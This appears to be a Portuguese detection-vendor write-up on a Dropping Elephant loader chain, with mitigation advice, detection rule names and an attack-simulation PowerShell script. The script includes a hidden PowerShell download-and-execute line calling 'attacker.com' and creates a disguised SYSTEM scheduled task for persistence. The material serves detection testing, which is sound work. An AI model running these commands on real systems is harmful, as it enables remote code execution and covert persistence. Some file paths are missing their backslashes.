Malware em Alta: Dentro da Cadeia de Loader do Dropping Elephant
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha sofisticada atribuída ao Dropping Elephant utiliza documentos de isca temáticos da China para entregar um trojan de acesso remoto atualizado e residente em memória. A invasão depende do carregamento de DLL através de um binário legítimo da Microsoft e do carregador de shellcode Donut para evitar a detecção baseada em disco. A carga final também utiliza métodos avançados de evasão, incluindo achatamento de fluxo de controle e reconstrução de API em tempo de execução.
Investigação
Pesquisadores da Rapid7 descobriram a ameaça durante uma caça proativa que começou com um atalho malicioso do Windows disfarçado de documento PDF. Sua investigação seguiu a cadeia de carga útil desde o estágio inicial em chinagreenenergy[.]org através do carregamento de DLL de APPWIZ.cpl até a execução de um RAT em memória. A análise em nível de código com Diaphora confirmou uma linhagem comum com amostras anteriores do Dropping Elephant, apesar de extensa reformulação.
Mitigação
Os defensores devem priorizar detecções comportamentais, como arquivos de atalho lançando PowerShell e estágio de carga útil suspeito em C:UsersPublic. Monitorar tarefas agendadas com nomes incomuns e identificar o carregamento de DLL de diretórios inesperados também é importante. Além disso, defesas em endpoints precisam de visibilidade em nível de memória para detectar alterações no AMSI, WLDP e ETW.
Resposta
Se essa atividade for detectada, isole imediatamente os sistemas afetados para interromper o tráfego de comando e controle. Realize forense na memória para identificar o RAT injetado e inspecione as tarefas agendadas para persistência. Logs de rede também devem ser revisados para tráfego HTTPS não autorizado para os domínios de C2 conhecidos e para quaisquer sinais de exfiltração de arquivos.
Fluxo de Ataque
Detecções
Possíveis Tentativas de Comunicação de Domínios de Pesquisa de IP (via dns)
Ver
Execução de Mudança de Página de Código Incomum (via linha de comando)
Ver
Tarefa Agendada Suspeita (via auditoria)
Ver
Execução Suspeita do Perfil de Usuário Público (via criação de processo)
Ver
Biblioteca Dinâmica Vcruntime140 Carregada de Diretório Suspeito (via carregamento de imagem)
Ver
Arquivos Suspeitos no Perfil de Usuário Público (via evento de arquivo)
Ver
Detecção da Campanha de Malware Dropping Elephant [Conexão de Rede Windows]
Ver
Carregamento Suspeito de DLL Maliciosa via Fondue.exe [Evento de Arquivo do Windows]
Ver
Detecção da Campanha de Malware Dropping Elephant via Atalho e Side-Loading [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria e Linha de Base deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para disparar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos de Ataque: O adversário visa estabelecer persistência e executar um downloader. Para evitar filtragens padrão de e-mails, eles usam um arquivo de atalho chamado
GRES3001.lnkque aparece como um PDF. Quando clicado, ele chamaconhost.exepara executar um script PowerShell. Simultaneamente, eles estabelecem persistência criando uma tarefa agendada chamadaGoogleErrorReportprojetada para executarFondue.exede um diretório público, disfarçado como um legítimo relator de erro do Google para evitar inspeção casual. -
Script de Teste de Regressão:
# 1. Simular o comportamento de Atalho/Conhost # Simulamos a execução de conhost.exe com a string específica na linha de comando Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Nota: Para corresponder estritamente à 'CommandLine contains GRES3001.lnk', simulamos a chamada de processo como se tivesse vindo desse arquivo. # Como não podemos facilmente falsificar o nome do processo pai em um script simples, simulamos a string de linha de comando esperada. Write-Host "[!] Simulando disparo do GRES3001.lnk..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'" # Em um ambiente real, o campo 'CommandLine' no Sysmon conteria a string alvo. # 2. Simular a Tarefa Agendada e o side-loading do Fondue.exe Write-Host "[!] Simulando tarefa agendada GoogleErrorReport..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Tarefa Simulada Dropping Elephant" -User "SYSTEM" -Force Write-Host "[+] Simulação Completa. Verifique SIEM para alertas." -
Comandos de Limpeza:
# Remover o binário malware dummy Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Remover a tarefa agendada maliciosa Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Limpeza Completa."